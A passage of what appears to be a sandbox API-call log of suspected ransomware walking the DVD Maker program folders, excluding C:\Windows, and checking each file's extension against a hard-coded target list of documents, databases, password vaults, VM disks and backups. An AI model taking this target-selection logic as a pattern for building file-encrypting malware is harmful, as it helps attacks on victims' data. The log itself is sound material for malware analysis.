[0040.161] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.161] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.161] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.161] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", pszFile="nav_uparrow.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" [0040.162] PathFindExtensionW (pszPath="nav_uparrow.png") returned=".png" [0040.162] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.162] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.162] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.162] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.163] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.163] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="BabyGirl" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" [0040.163] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 0x0 [0040.163] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*" [0040.163] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.165] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.165] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.165] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="16_9-frame-background.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" [0040.165] PathFindExtensionW (pszPath="16_9-frame-background.png") returned=".png" [0040.165] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.165] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.166] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.166] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="16_9-frame-highlight.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" [0040.166] PathFindExtensionW (pszPath="16_9-frame-highlight.png") returned=".png" [0040.166] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.166] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.166] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.166] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="16_9-frame-image-mask.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" [0040.166] PathFindExtensionW (pszPath="16_9-frame-image-mask.png") returned=".png" [0040.166] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.166] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.166] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.167] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="babypink.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" [0040.167] PathFindExtensionW (pszPath="babypink.png") returned=".png" [0040.167] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.167] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.167] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.167] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="background.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" [0040.167] PathFindExtensionW (pszPath="background.png") returned=".png" [0040.167] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.167] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.167] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.167] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="bear_formatted_matte2.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" [0040.167] PathFindExtensionW (pszPath="bear_formatted_matte2.wmv") returned=".wmv" [0040.167] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.168] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.168] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.168] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="Bear_Formatted_MATTE2_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" [0040.168] PathFindExtensionW (pszPath="Bear_Formatted_MATTE2_PAL.wmv") returned=".wmv" [0040.168] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.168] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.168] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.168] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="bear_formatted_rgb6.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" [0040.168] PathFindExtensionW (pszPath="bear_formatted_rgb6.wmv") returned=".wmv" [0040.168] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.168] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.168] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.168] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="Bear_Formatted_RGB6_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" [0040.168] PathFindExtensionW (pszPath="Bear_Formatted_RGB6_PAL.wmv") returned=".wmv" [0040.168] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.169] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.169] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.169] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="btn-back-static.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" [0040.169] PathFindExtensionW (pszPath="btn-back-static.png") returned=".png" [0040.169] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.169] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.169] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.169] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="btn-next-static.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" [0040.169] PathFindExtensionW (pszPath="btn-next-static.png") returned=".png" [0040.169] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.169] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.169] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.169] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="btn-previous-static.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" [0040.169] PathFindExtensionW (pszPath="btn-previous-static.png") returned=".png" [0040.169] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.169] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.169] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.169] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="button-highlight.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" [0040.170] PathFindExtensionW (pszPath="button-highlight.png") returned=".png" [0040.170] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.170] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.170] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.170] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="chapters-static.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" [0040.170] PathFindExtensionW (pszPath="chapters-static.png") returned=".png" [0040.170] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.170] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.170] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.170] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="content-background.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" [0040.170] PathFindExtensionW (pszPath="content-background.png") returned=".png" [0040.170] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.170] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.170] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.170] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="content-foreground.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" [0040.170] PathFindExtensionW (pszPath="content-foreground.png") returned=".png" [0040.170] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.170] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.170] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.171] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="curtains.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" [0040.171] PathFindExtensionW (pszPath="curtains.png") returned=".png" [0040.171] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.171] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.171] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.171] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="flower_precomp_matte.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" [0040.171] PathFindExtensionW (pszPath="flower_precomp_matte.wmv") returned=".wmv" [0040.171] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.171] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.171] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.171] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="flower_PreComp_MATTE_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" [0040.171] PathFindExtensionW (pszPath="flower_PreComp_MATTE_PAL.wmv") returned=".wmv" [0040.171] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.171] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.171] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.171] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="flower_trans_matte.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" [0040.171] PathFindExtensionW (pszPath="flower_trans_matte.wmv") returned=".wmv" [0040.171] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.171] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.172] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.172] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="flower_trans_MATTE_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" [0040.172] PathFindExtensionW (pszPath="flower_trans_MATTE_PAL.wmv") returned=".wmv" [0040.172] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.172] StrStrIW 